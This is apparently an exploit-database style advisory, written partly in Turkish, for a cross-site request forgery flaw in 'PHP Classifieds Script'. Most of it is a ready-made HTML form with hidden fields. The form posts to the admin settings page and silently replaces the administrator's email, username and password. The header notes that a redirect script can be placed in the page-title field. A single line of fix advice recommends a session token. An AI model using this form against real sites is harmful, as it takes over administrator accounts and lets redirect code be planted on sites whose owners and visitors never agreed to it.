< ------------------- header data start ------------------- >

#############################################################

# Application Name : PHP Classifieds Script

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirilebilir ..! yönlendirme kodu konabilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !

# Demo : http://www.phpclassifiedsscript.com/demo/admin/settings/index.php

# author : CWCaspeR ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form action=’http://hedefsite.com/scriptyolu/admin/settings/index.php’ method=’post’>
<input type=’hidden’ name=’Email’ value=’[email protected]’ required=’yes’ validate=’email’ message=’Enter Email.’>
<input type=’hidden’ name=’username’ value=’username’ required=’yes’ validate=’text’ message=’Enter username.’>
<input type=’hidden’ name=’password’ value=’passWORD’ required=’yes’ validate=’text’ message=’Enter password.’>
<input type=’hidden’ name=’Domain’ value=’http://domainadi.com’ required=’yes’ validate=’text’ message=’Enter Domain Name.’>
<input type=’hidden’ name=’GoogleMapKey’ value=’’>
<input type=’hidden’ name=’PageTitle’ value=’ISTERSENYONLENDIRMEKODUKOY’ required=’yes’ validate=’text’ message=’Enter Page Title.’>
<input type=’hidden’ name=’Banner’ value=’’ required=’yes’ validate=’text’ message=’Enter Banner Image.’>
<input value=’5’ type=’hidden’ name=’NumAds’ required=’yes’ validate=’int’ message=’Enter Number of Ads Shown.’>
<input type=’hidden’ name=’DefaultCountry’ required=’yes’ value=’USA’ validate=’text’ message=’Enter Zip/Postal code Search: Default Country.’>
<input type=’hidden’ name=’YahooWeatherRSS’ required=’yes’ validate=’text’ message=’Enter Yahoo Default Weather RSS URL.’ value=’’>
<input type=’submit’ value=’BUTONADI’>
</form>

< -- bug code end of -- >